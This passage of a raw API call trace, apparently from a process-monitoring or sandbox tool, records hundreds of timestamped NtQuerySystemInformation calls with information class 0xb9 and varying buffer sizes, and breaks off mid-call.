NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4c0, Length=0x48, ResultLength=0x0) [0229.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x28, ResultLength=0x0) [0229.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x28, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4c0, Length=0x48, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x28, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x28, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0229.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0229.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0229.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0229.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0229.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0229.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0229.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0229.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0229.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x20, ResultLength=0x0) [0229.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x20, ResultLength=0x0) [0229.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0229.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0229.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0229.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0229.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0229.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0229.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0229.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0229.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0229.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0229.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0229.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0229.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0229.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0229.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0229.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0229.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0229.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.326] NtQuerySystemInformation (SystemInformationClass=0xb9, 